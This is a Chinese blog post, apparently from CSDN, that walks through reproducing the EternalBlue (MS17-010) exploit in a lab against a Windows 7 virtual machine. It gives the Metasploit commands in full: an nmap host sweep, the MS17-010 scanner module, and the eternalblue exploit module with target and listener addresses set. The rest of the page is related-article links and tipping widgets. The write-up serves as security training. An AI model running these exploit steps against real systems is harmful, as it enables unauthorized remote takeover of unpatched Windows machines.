永恒之蓝漏洞复现

已于 2024-08-06 09:15:34 修改
阅读量296 收藏 4
点赞数 6
文章标签: 运维 安全架构 windows linux
于 2024-08-03 17:26:17 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_57379923/article/details/140893831
版权

一、基本信息

攻击机:kali IP:192.168.100.60

靶机:Windows7 IP:192.168.100.20

二、攻击过程

使用 NMAP 进行主机发现,找到目标机 IP 地址

 

nmap -sP 192.168.100.0/24
 

   
 

 

 

启动 MSF
 

 

msfconsole
 

   
 

 

 

查找永恒之蓝漏洞模块
 

 

search ms17-010
 

   
 

auxiliary/scanner/smb/smb_ms17_010 是永恒之蓝扫描模块,探测目标主机是否存在 MS17-010 漏洞。
 exploit/windows/smb/ms17_010_eternalblue 是永恒之蓝攻击代码,一般两者配合使用,前者先扫描,若是显示有漏洞,再进行攻击。
 

使用模块进行扫描
 

 

use auxiliary/scanner/smb/smb_ms17_010
 

   
 

设置检测目标主机并开始检测
 

 

set rhosts 192.168.100.20
run
 

   
 

 

 

使用 ms17-010 攻击模块,对靶机进行攻击
 

 

use exploit/windows/smb/ms17_010_eternalblue
 

   
 

设置目标机、监听机,并开始攻击
 

 

set rhosts 192.168.100.20
set lhost 192.168.100.60
run
 

   
 

 

 

攻击成功
 

 

 

 

 

 

作 者:PeiyuJue
 链 接: https://peiyu.serv00.net/2024/07/06/永恒之蓝复现/
 来 源:Aaron的博客
 版 权 声 明:本博客所有文章除特别声明外,均采用CC BY-NC-SA 4.0许可协议。文章版权归作者所有,未经允许请勿转载!
 


                

        

        

    

  


    

      

        

            

              
                
                  Aaron_Jㅤ
                
              
            

            

                关注
              
            

        

        

          
    
            
  • 
              
                
                
                
                
                    6
                
              
              
    点赞
    
            
    • 
            
  • 
              
                
                
                
              
              
    
            
    • 
            
  • 
              
                
                
                
                
                    4
                
              
              
    
                
    
                  
                    收藏
                  
                
    
              
    
              
    
                
    
                  觉得还不错?
                  
                    一键收藏
                  
                 
                
    
              
    
            
    • 
                
  • 
                  
                    打赏
                    
                  
                  
    打赏
    
                
    • 
          
  • 
            
    
              
              
            
    
              
              
              
                  1
              
            
            
    评论
    
          
    • 
          
  • 
          
    • 
          
  • 
            
              
            
              
    
            
              
                
            
    
          
    • 
        

      

      










                



	

		

			

				
					
永恒之蓝漏洞复现(包括常见问题处理)和修复方案

				
			

			

				

					sinat_27757177的博客
				

				

					10-17
					
					5129
					
				

			

		

		

			
				
永恒之蓝漏洞复现(包括常见问题处理)和修复方案

			
		

	



                

              
                



	

		

			

				
					
永恒之蓝漏洞扫描工具官方版

				
			

			

				

					08-06
				

			

		

		

			
				
可以批量扫描局域网内存在永恒之蓝漏洞的工具,比某安工具强大N倍

			
		

	



                


  
              

                


	

		

			

				
					
永恒之蓝漏洞复现(详细版)

				
			

			

				

					Zqinglele的博客
				

				

					03-20
					
					3191
					
				

			

		

		

			
				
matesploit框架(Matesploit Framework,MSF)是一个开源工具,由Ruby程序语言编写的模块化框架,主要为后端提供用来测试的端口(如控制台、Web、CLI)。常用为控制台接口,通过该接口可以访问matesploit框架的所有插件(如payloads、利用模块、post模块等),还可使用第三方程序的插件(如sqlmap、nmap等)。这下只需配置靶机IP地址、命名的管道、端口、线程数(后三个已经配置好了)成功发现可利用漏洞ms17-010,,扫描模块结束,接下尝试进行攻击。

			
		

	





	

		

			

				
					
2024年最新[永恒之蓝]实战-漏洞复现_永恒之蓝漏洞复现实验(1)

				
			

			

				

					2401_84297796的博客
				

				

					05-03
					
					863
					
				

			

		

		

			
				
1、msfconsole进入MSF模式,再测试能不能ping通目标主机(192.168.164.129),用nmap扫描主机开放445端口,接下用msf测试一下漏洞是否存在。3、我们在第二步的时候使用的是auxiliary模块进行的漏洞检测,这回我们使用exploit模块进行漏洞利用。2、这里我们先选择#1的auxiliary(辅助模块)先进行踩点,查看漏洞是否可以利用,再去进行渗透攻击。3、使用#show options 命令,查看需要设置的选项(Required为yes是必须设置的选项)。

			
		

	



		

			
		



	

		

			

				
					
win7虚拟机永恒之蓝漏洞复现

				
			

			

				

					xxxpnb的博客
				

				

					01-15
					
					478
					
				

			

		

		

			
				
web安全菜鸟一枚

			
		

	





	

		

			

				
					
能源交通行业ITSM案例分析报告

				
			

			

				

					服务创造价值
				

				

					09-05
					
					877
					
				

			

		

		

			
				
通过上述分析可以看出,采和科技的ITSM产品组合为能源交通行业提供了高效、可靠的IT运维管理解决方案,不仅满足了设备多样性和分布广泛的需求,而且通过全面监控和智能告警机制,显著提升了系统的稳定性和安全性,帮助企业在数据驱动的基础上实现更高效的运维管理。此外,采和科技的IT资产管理系统(CMDB)通过提供详细的IT资源管理,包括配置拓扑视图,使得IT资产和业务系统之间的关系更加清晰,有助于变更管理和风险评估,从而提高了资产利用率和管理效率。在这种背景下,建设一个高效、规范的数字化运维体系变得尤为迫切。

			
		

	





	

		

			

				
					
linux运维常见命令行

				
			

			

				

					wendao76的专栏
				

				

					09-09
					
					1662
					
				

			

		

		

			
				
linux常用命令行,用户管理,文件管理, 磁盘管理,  网络管里,进程管理等等

			
		

	





	

		

			

				
					
最新版微服务项目搭建

				
			

			

				

					m0_46606920的博客
				

				

					09-08
					
					1244
					
				

			

		

		

			
				
最新版微服务搭建,使用nacos,redis,mongodb,gateway,openfeign等技术

			
		

	





	

		

			

				
					
我是如何将 Java 基础 docker 镜像大小从 674Mb 优化到 58Mb的

				
			

			

				

					周国通的博客
				

				

					09-10
					
					815
					
				

			

		

		

			
				
如果您是 Java 开发人员,并且正在使用 Docker 打包应用程序,您可能已经注意到,即使是“hello world”类型的项目,最终镜像的大小也可能非常大。在本文中,我们将介绍一些优化 Java 应用程序的 Docker 镜像大小的技巧。我们将使用上一篇文章《中构建的相同 Spring web 应用程序来演示这些技巧。不是太多吧?但正如你所看到的,最简单的docker镜像(没有应用一些优化)的大小可能相当大。不是太多吧?

			
		

	





	

		

			

				
					
2024伊语IM即时通讯源码/im商城系统/纯源码IM通讯系统安卓+IOS前端纯原生源码

				
			

			

				

					翎风世界
				

				

					09-10
					
					452
					
				

			

		

		

			
				
2.4 node安装wget "https://nodejs.org/dist/v12.18.3/node-v12.18.3-linux-x64.tar.xz"资料参考地址:https://www.1234f.com/sj/GitHub/qtym/20240910/677.html。源码下载地址:https://www.123pan.com/s/LA1bVv-5l5Vv。备用下载地址:http://pan.1234f.com:5212/s/5PrS4。api.xxx.com接口。im.xxx.com通讯。

			
		

	





	

		

			

				
					
Python知识点:如何使用Vagrant进行开发环境搭建

				
			

			

				

					码农超哥的博客
				

				

					09-08
					
					813
					
				

			

		

		

			
				
使用 Vagrant 可以极大地简化开发环境的配置和管理,它保证了开发团队在相同的环境下进行开发,避免了“在我机器上正常运行”的问题。通过简单配置,你可以轻松创建跨平台、一致性强的开发环境。

			
		

	





	

		

			

				
					
欧拉数据库的搭建及其部署

				
			

			

				

					恭喜你发现了我!!!!
				

				

					09-05
					
					815
					
				

			

		

		

			
				
进行数据库安装前,必须保证软件yum仓库搭建完成使用命令 dnf install mariadb-server,发现冲突selinux-policy-targeted-35.5-21.oe2203sp3.noarch有问题找到发生冲突的两个包使用nodeps对两个安装包命令,在进行安装软件时忽略软件依赖性(简单来说就是删除)进行检测现在开机启动数据库直接启动数据库使用命令进行安全初始化。

			
		

	





	

		

			

				
					
文件系统(磁盘 磁盘文件 inode)

					
最新发布

				
			

			

				

					2302_78639896的博客
				

				

					09-10
					
					612
					
				

			

		

		

			
				
然后在inode Bitmap找位图,从低向高找,看哪个为0,给我们分配的新的偏移量+新分配的inode编号就是新的inode,根据新的inode号在inode Table里把属性一写。记录的信息主要有:bolck 和 inode的总量,未使用的block和inode的数量,一个block和inode的大小,最近一次挂载的时间,最近一次写入数据的时间,最近一次检验磁盘的时间等其他文件系统的相关信息。inode编号是以分区为单位分配的,一个分区的inode号是不能重复的。我们平时访问时都用的文件名。

			
		

	





	

		

			

				
					
sshd_config配置说明

				
			

			

				

					beck_li的博客
				

				

					09-10
					
					634
					
				

			

		

		

			
				
Compression:是否对通信数据进行加密,可用值:“yes", "delayed"(默认,延迟认证成功后加密), "no"KerberosOrLocalPasswd:如果 Kerberos 密码认证失败,那么该密码还将要通过其它的认证机制。如果超过10个并发初始连接,则后续的连接由30%的概率直接关闭,如果超过100个连接,则所有新连接100%直接关闭。AddressFamily:使用地址族,any(默认)、inet(仅IPv4)、inet6(仅IPv6)

			
		

	





	

		

			

				
					
前端vue项目服务器部署(docker)

				
			

			

				

					m0_46122129的博客
				

				

					09-07
					
					637
					
				

			

		

		

			
				
将你的nginx-alpine.tar包上传到服务器上。假设路径为 。
2、导入 Nginx Docker 镜像
使用以下命令将  文件加载为 Docker 镜像:
执行后会显示类似如下的输出,表示镜像已成功加载:
3、验证镜像是否加载
确认镜像已经导入成功:
应该可以看到  镜像在列表中。在你的服务器上确保  目录下包含以下内容:- :Vue 项目构建后的静态文件。- :自定义的 Nginx 配置文件。- 。确保  目录中有你的 Vue 项目的打包内容。在  下编写或确保已经有如下内容的 :
3、编写ng

			
		

	





	

		

			

				
					
RK3568安装部署Docker容器

				
			

			

				

					shjhuang的专栏
				

				

					09-07
					
					326
					
				

			

		

		

			
				
设置华为镜像源更新索引。

			
		

	





	

		

			

				
					
用MobaXterm工具的Linux远程SSH登录

				
			

			

				

					m0_56147044的博客
				

				

					09-05
					
					433
					
				

			

		

		

			
				
去官网下载。

			
		

	





	

		

			

				
					
永恒之蓝漏洞复现流程

				
			

			

				

					09-01
				

			

		

		

			
				
- *1* *2* *3* [永恒之蓝漏洞复现](https://blog.csdn.net/weixin_39096432/article/details/115422428)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_...

			
		

	



              




          




        



    





    



      

      

        
      

      





	

		
评论 1

	

	
	




  

    

      添加红包
      
    

    

      

        
        

          
          
        

        
请填写红包祝福语或标题

      

      

        
        

          
          
        

        
红包个数最小为10个

      

      

        
        

          
          
        

        
红包金额最低5元

      

      

        
        

          当前余额3.43前往充值 >
        

      

      

        

          需支付:10.00

        
        
      

    

  





  

    
    
  

  

    
    
  








  

    

      

        

          

            
            
成就一亿技术人!

          

          

        

        

          

          

            领取后你会自动成为博主和红包主的粉丝
            规则
          

        

      

      

        

          

            
              
            
            

              
hope_wisdom
 发出的红包
            

          

        

        

          

          

          

        

      

    

    

  





	
打赏作者

	

		

		
			
		
		

		

			
Aaron_Jㅤ

			
你的鼓励将是我创作的最大动力

		

	

	

			

	

	

    ¥1
    ¥2
    ¥4
    ¥6
    ¥10
    ¥20
	

	

		

			

				

					扫码支付:¥1
				

				

					

					
					获取中
					

				

				

					
					
					扫码支付
				

			

		

		

			
您的余额不足,请更换扫码支付或充值

			
打赏作者

		

	



      
      

      
实付

      
使用余额支付

      

        

          

            
            点击重新获取
          

        

        
扫码支付

      

      

        
          
            
          
          
        
      

      

        
        钱包余额
          0
          

            
            

              

                
抵扣说明:

                
 1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
 2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

              

            

          

      

      余额充值